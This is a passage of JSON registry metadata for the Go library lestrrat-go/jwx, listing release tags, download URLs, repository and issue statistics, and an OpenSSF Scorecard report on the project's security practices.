1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"3294517bae6989c5e89b00d0f72d79667d098942","kind":"commit","published_at":"2020-07-08T07:05:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3/manifests"},{"name":"v1.0.2","sha":"d173045330f3e507d1d34b7fa622763dd744ecd6","kind":"commit","published_at":"2020-05-07T12:10:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"9969e2cb3255455a4a6b8a6da164bf80877155ef","kind":"commit","published_at":"2020-05-04T05:46:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5e17c3a031d6fb0962f929adcc3effc6dbb9f102","kind":"commit","published_at":"2020-05-03T03:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0/manifests"},{"name":"v0.9.2","sha":"1402056cec6d7faba7454657f7bf180b2b1f14d5","kind":"commit","published_at":"2020-04-13T03:20:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"041c40732a8843e7d4a0b7cd2cffbe2f339f92ca","kind":"commit","published_at":"2020-02-26T22:25:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"5d60d87d07ddea9874404944870bec81aabcf574","kind":"commit","published_at":"2019-05-20T02:55:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-03-25T17:02:57.960Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":9.345852080216646,"dependent_packages_count":6.999148183520997,"stargazers_count":1.0929961382075044,"forks_count":1.4345083313038627,"average":4.718126183312252},"purl":"pkg:golang/github.com/lestrrat-go/jwx/jwa/internal/cmd/gentypes","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/jwa/internal/cmd/gentypes","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/jwa/internal/cmd/gentypes","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/jwa/internal/cmd/gentypes/dependencies","status":null,"funding_links":["https://github.com/sponsors/lestrrat"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-23T10:02:05.442Z","issues_count":94,"pull_requests_count":747,"avg_time_to_close_issue":3354245.694117647,"avg_time_to_close_pull_request":304118.8680351906,"issues_closed_count":85,"pull_requests_closed_count":682,"pull_request_authors_count":27,"issue_authors_count":64,"avg_comments_per_issue":3.978723404255319,"avg_comments_per_pull_request":0.5903614457831325,"merged_pull_requests_count":577,"bot_issues_count":1,"bot_pull_requests_count":372,"past_year_issues_count":13,"past_year_pull_requests_count":196,"past_year_avg_time_to_close_issue":210964.44444444444,"past_year_avg_time_to_close_pull_request":191349.9512195122,"past_year_issues_closed_count":9,"past_year_pull_requests_closed_count":164,"past_year_pull_request_authors_count":10,"past_year_issue_authors_count":11,"past_year_avg_comments_per_issue":2.923076923076923,"past_year_avg_comments_per_pull_request":0.2857142857142857,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":80,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/issues","maintainers":[{"login":"lestrrat","count":345,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}],"active_maintainers":[{"login":"lestrrat","count":104,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwa%2Finternal%2Fcmd%2Fgentypes/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwa%2Finternal%2Fcmd%2Fgentypes/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwa%2Finternal%2Fcmd%2Fgentypes/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwa%2Finternal%2Fcmd%2Fgentypes/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwa%2Finternal%2Fcmd%2Fgentypes/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwa%2Finternal%2Fcmd%2Fgentypes/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":11403847,"name":"github.com/lestrrat-go/jwx/v2/x25519","ecosystem":"go","description":"","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx/v2","versions_count":0,"first_release_published_at":null,"latest_release_published_at":"2025-12-26T14:44:30.551Z","latest_release_number":null,"last_synced_at":"2026-05-10T03:02:21.149Z","created_at":"2025-03-04T20:08:06.384Z","updated_at":"2026-05-10T03:02:21.149Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/x25519","install_command":"go get github.com/lestrrat-go/jwx/v2/x25519","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/x25519#section-documentation","metadata":{},"repo_metadata":{"id":37406150,"uuid":"45516769","full_name":"lestrrat-go/jwx","owner":"lestrrat-go","description":"Complete implementation of JWx (Javascript Object Signing and Encryption/JOSE) technologies for Go. #golang #jwt #jws #jwk #jwe","archived":false,"fork":false,"pushed_at":"2026-03-23T20:34:17.000Z","size":21587,"stargazers_count":2339,"open_issues_count":5,"forks_count":192,"subscribers_count":24,"default_branch":"develop/v3","last_synced_at":"2026-03-24T15:23:41.313Z","etag":null,"topics":["go","golang","jwe","jwk","jws","jwt","oidc"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lestrrat-go.png","metadata":{"files":{"readme":"README.md","changelog":"Changes","contributing":".github/CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","dco":null,"cla":null},"funding":{"github":["lestrrat"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-11-04T05:12:52.000Z","updated_at":"2026-03-23T20:34:22.000Z","dependencies_parsed_at":"2023-09-23T13:31:33.054Z","dependency_job_id":"8122a1a4-053c-4ee5-9b97-9972c16335ef","html_url":"https://github.com/lestrrat-go/jwx","commit_stats":{"total_commits":1692,"total_committers":66,"mean_commits":"25.636363636363637","dds":0.3427895981087471,"last_synced_commit":"f0730766974533dcd9e5f8074a0adfcc471b0f0a"},"previous_names":["lestrrat/jwx"],"tags_count":106,"template":false,"template_full_name":null,"purl":"pkg:github/lestrrat-go/jwx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/refs/heads/develop/v3","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/sbom","scorecard":{"id":371885,"data":{"date":"2025-08-11","repo":{"name":"github.com/lestrrat-go/jwx","commit":"568c2c84f11f47f53126b44bf3a3d76993038cba"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":6.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":0,"reason":"Found 0/23 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:28","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:29","Warn: no topLevel permission defined: .github/workflows/assign-issue.yml:1","Warn: no topLevel permission defined: .github/workflows/assign-pr.yml:1","Warn: no topLevel permission defined: .github/workflows/autodoc.yml:1","Warn: no topLevel permission defined: .github/workflows/benchmark.yml:1","Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/codeql.yml:1","Warn: no topLevel permission defined: .github/workflows/dependabot.yml:1","Warn: no topLevel permission defined: .github/workflows/lint.yml:1","Warn: no topLevel permission defined: .github/workflows/smoke.yml:1","Warn: no topLevel permission defined: .github/workflows/stale.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Pinned-Dependencies","score":6,"reason":"dependency not pinned by hash detected -- score normalized to 6","details":["Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/ci.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: goCommand not pinned by hash: .github/workflows/benchmark.yml:33","Warn: goCommand not pinned by hash: .github/workflows/ci.yml:36","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:42","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:44","Info:  15 out of  18 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   5 third-party GitHubAction dependencies pinned","Info:   2 out of   6 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 24 commits out of 27 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T13:10:24.800Z","repository_id":37406150,"created_at":"2025-08-18T13:10:24.800Z","updated_at":"2025-08-18T13:10:24.800Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30897961,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-24T08:58:18.477Z","status":"ssl_error","status_checked_at":"2026-03-24T08:57:59.595Z","response_time":106,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"lestrrat-go","name":"lestrrat-go","uuid":"36653903","kind":"organization","description":"@lestrrat 's Go projects","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/36653903?v=4","repositories_count":99,"last_synced_at":"2023-08-07T14:22:53.617Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/lestrrat-go","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-06T19:45:03.488Z","updated_at":"2023-08-07T14:22:54.666Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go/repositories"},"tags":[{"name":"v3.0.13","sha":"163a6e94d45a8f89c7d0e25f30652a95c554bd88","kind":"commit","published_at":"2026-01-12T06:38:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13/manifests"},{"name":"v3.0.12","sha":"987379965645db94a50483d7c21c9358b905469a","kind":"commit","published_at":"2025-10-20T09:17:05.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12/manifests"},{"name":"v3.0.11","sha":"9e9c27a269a1a650e1f666b18946dd1796f84779","kind":"commit","published_at":"2025-09-14T02:50:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11/manifests"},{"name":"v3.0.10","sha":"e14eb9b9730b352cb5f8854bbdf315bb98d1a5e0","kind":"commit","published_at":"2025-08-04T12:36:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10/manifests"},{"name":"v3.0.9","sha":"8babbb1d64fda50d89276b5d52b1a682362334b2","kind":"commit","published_at":"2025-07-31T06:59:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9/manifests"},{"name":"v3.0.8","sha":"7f3caf368dda160290bcc6952b4bfb549e308271","kind":"commit","published_at":"2025-06-27T10:33:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8/manifests"},{"name":"v3.0.7","sha":"202bc50cf39999c4379eaaa593e4bd2aea9f870f","kind":"commit","published_at":"2025-06-16T00:42:56.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7/manifests"},{"name":"v3.0.6","sha":"a68b08e71ab7cc4fb6098d2c453da41cc7a7967f","kind":"commit","published_at":"2025-06-13T11:06:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6/manifests"},{"name":"v3.0.5","sha":"c3404a9d9937bc0d7a0f89ecfbc1303fd108c67d","kind":"commit","published_at":"2025-06-11T00:58:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5/manifests"},{"name":"v3.0.4","sha":"3f1f2b899191cf6c40404736681a180e479c84eb","kind":"commit","published_at":"2025-06-09T12:04:08.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4/manifests"},{"name":"v3.0.3","sha":"b1a4fc672df21b754d9904306e80c9be22deeba4","kind":"commit","published_at":"2025-06-06T01:53:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3/manifests"},{"name":"v3.0.2","sha":"542198a7a000125443d53107fbd55c9336943c4d","kind":"commit","published_at":"2025-06-03T12:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2/manifests"},{"name":"v2.1.6","sha":"13e92f3eb3982c11fa6a19280e00e3256237cf87","kind":"commit","published_at":"2025-04-29T08:17:11.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6/manifests"},{"name":"v3.0.1","sha":"374ec5920fce56373ebe3a9c89134a2d6f81d4cd","kind":"commit","published_at":"2025-04-29T08:15:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.1","html_url":"https://github.com/lestrrat-go/jwx/rel